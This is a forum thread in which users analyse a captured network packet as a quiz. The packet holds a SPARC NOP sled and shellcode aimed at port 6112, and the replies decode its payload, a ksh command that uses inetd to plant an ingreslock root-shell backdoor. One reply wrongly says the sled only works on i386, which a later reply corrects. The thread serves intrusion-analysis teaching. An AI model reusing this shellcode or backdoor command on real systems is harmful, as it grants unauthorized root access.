Found this example on the web.. dont want to give URL away yet, since the guy has a very nice writeup detailing whats going on....

1) What is going on in the following 2 packets. What type of attack, etc..
2) What is the significance of the "@" symbols?
3) What architecture/OS was this targetted at?



14:46:04.378306 adsl-61-1-160.dab.bellsouth.net.3592 > 172.16.1.102.6112: P 1:14

49(1448) ack 1 win 16060 <nop,nop,timestamp 463986683 4158792> (DF)
0x0000 4500 05dc a1ac 4000 3006 241c d03d 01a0 E.....@.0.$..=..
0x0010 ac10 0166 0e08 17e0 fee2 c115 5f66 192f ...f........_f./
0x0020 8018 3ebc e1e9 0000 0101 080a 1ba7 dffb ..>.............
0x0030 003f 7548 3030 3030 3030 3032 3034 3130 .?uH000000020410
0x0040 3365 3030 3031 2020 3420 0000 0031 3000 3e0001..4....10.
0x0050 801c 4011 801c 4011 1080 0101 801c 4011 .@...@.......@.
0x0060 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@.
0x0070 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@.
0x0080 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@.
0x0090 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@.
0x00a0 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@.
0x00b0 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@.
0x00c0 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@.
0x00d0 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@.
0x00e0 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@.
0x00f0 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@.



0x04d0 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@.
0x04e0 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@.
0x04f0 20bf ffff 20bf ffff 7fff ffff 9003 e034 ...............4
0x0500 9223 e020 a202 200c a402 2010 c02a 2008 .#...........*..
0x0510 c02a 200e d023 ffe0 e223 ffe4 e423 ffe8 .*...#...#...#..
0x0520 c023 ffec 8210 200b 91d0 2008 2f62 696e .#........../bin
0x0530 2f6b 7368 2020 2020 2d63 2020 6563 686f /ksh....-c..echo
0x0540 2022 696e 6772 6573 6c6f 636b 2073 7472 ."ingreslock.str
0x0550 6561 6d20 7463 7020 6e6f 7761 6974 2072 eam.tcp.nowait.r
0x0560 6f6f 7420 2f62 696e 2f73 6820 7368 202d oot./bin/sh.sh.-
0x0570 6922 3e2f 746d 702f 783b 2f75 7372 2f73 i">/tmp/x;/usr/s
0x0580 6269 6e2f 696e 6574 6420 2d73 202f 746d bin/inetd.-s./tm
0x0590 702f 783b 736c 6565 7020 3130 3b2f 6269 p/x;sleep.10;/bi
0x05a0 6e2f 726d 202d 6620 2f74 6d70 2f78 2041 n/rm.-f./tmp/x.A
0x05b0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x05c0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x05d0 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAA

1) What is going on in the following 2 packets. What type of attack, etc..
2) What is the significance of the "@" symbols?
3) What architecture/OS was this targetted at?


NOP instruction code for the Sparc architecture. It will only work on i386 machines though. you basically putting a padding inside the buffer and their basically trying to execute:

./bin/ksh -c echo "ingreslock stream tcp nowait root /bin/sh sh - i"/tmp/x;/usr/sbin/inetd -s /tmp/x;sleep 10;/bin/rm -f /tmp/x

Soup has it mostly right, but looks like he didnt copy/paste an important part
:wink:
It will only work on i386 machines though.
The more familiar NOP slide being 0x90, however, will only work on i386 machines.

Here is the paper i grabbed it from.

http://www.securityfocus.com/infocus/1676

:) i was actually reading that article earlier...